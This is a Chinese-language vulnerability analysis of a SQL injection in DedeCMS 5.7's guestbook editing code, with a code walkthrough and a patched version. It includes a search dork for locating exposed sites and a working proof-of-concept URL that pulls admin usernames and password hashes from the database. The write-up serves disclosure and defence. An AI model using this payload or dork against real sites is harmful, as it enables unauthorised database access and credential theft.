標籤:
catalog
1. 漏洞描述2. 漏洞觸發條件3. 漏洞影響範圍4. 漏洞程式碼分析5. 防禦方法6. 攻防思考
1. 漏洞描述
注射漏洞成功需要條件如下
1. php magic_quotes_gpc=off2. 漏洞檔案存在: plus/guestbook.php3. 在資料庫中: dede_guestbook也需要存在
Relevant Link:
inurl:/plus/guestbook.php
2. 漏洞觸發條件
1. http://localhost/dedecms5.7/plus/guestbook.php2. [回複/編輯]上可以看到訪問者留言的ID。則記下ID,例如: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&id=13. 訪問: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=errs.cc‘&id=14. 提交後,如果是dede5.7版本的話,會出現"成功更改或回複一條留言",那就證明修改成功了 5. 再返回到: http://localhost/dedecms5.7/plus/guestbook.php,看下改的那條留言內容是否變為了 errs.cc’ 如果是的話,那就證明此漏洞無法再利用應為他開啟: php magic_quotes_gpc=off6. 如果沒有修改成功,那留言ID的內容還是以前的,那就證明漏洞可以利用。7. 那麼再次訪問: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&id=1&msg=‘,msg=user(),email=‘8. 然後返回,那條留言ID的內容就直接修改成了mysql 的user().
Relevant Link:
http://www.51php.com/dedecms/16942.htmlhttp://www.wooyun.org/bugs/wooyun-2012-014501
3. 漏洞影響範圍
0x1: POC
view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=‘,[email protected]`‘`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email=‘
Relevant Link:
http://www.programgo.com/article/45492569994/http://www.cnblogs.com/Hkadmin/p/3712667.html
4. 漏洞程式碼分析
/plus/guestbook.php
//修改留言if($action==‘admin‘){ include_once(dirname(__FILE__).‘/guestbook/edit.inc.php‘); exit();}
\plus\guestbook\edit.inc.php
//這裡沒有判斷$g_isadmin,而是錯誤地信任了使用者的輸入: action = "admin"else if($job==‘editok‘) { $remsg = trim($remsg); //這裡沒有對$msg過濾,導致可以任意注入 $dsql->ExecuteNoneQuery("update `#@__guestbook` set `msg`=‘$msg‘, `posttime`=‘".time()."‘ where id=‘$id‘ "); ShowMsg("成功更改或回複一條留言!",$GUEST_BOOK_POS); exit();}
Relevant Link:
http://pannisec.diandian.com/?tag=SQL%E6%B3%A8%E5%B0%84
5. 防禦方法
\plus\guestbook\edit.inc.php
else if($job==‘editok‘){ $remsg = trim($remsg); /* 驗證$g_isadmin */ if($remsg!=‘‘) { //管理員回複不過濾HTML if($g_isadmin) { $msg = "<div class=\\‘rebox\\‘>".$msg."</div>\n".$remsg; //$remsg <br><font color=red>管理員回複:</font> } else { $row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id=‘$id‘ "); $oldmsg = "<div class=\\‘rebox\\‘>".addslashes($row[‘msg‘])."</div>\n"; $remsg = trimMsg(cn_substrR($remsg, 1024), 1); $msg = $oldmsg.$remsg; } } /* */ /* 對$msg進行有效過濾 */ $msg = addslashes($msg); /* */ $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`=‘$msg‘, `posttime`=‘".time()."‘ WHERE id=‘$id‘ "); ShowMsg("成功更改或回複一條留言!", $GUEST_BOOK_POS); exit();}
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
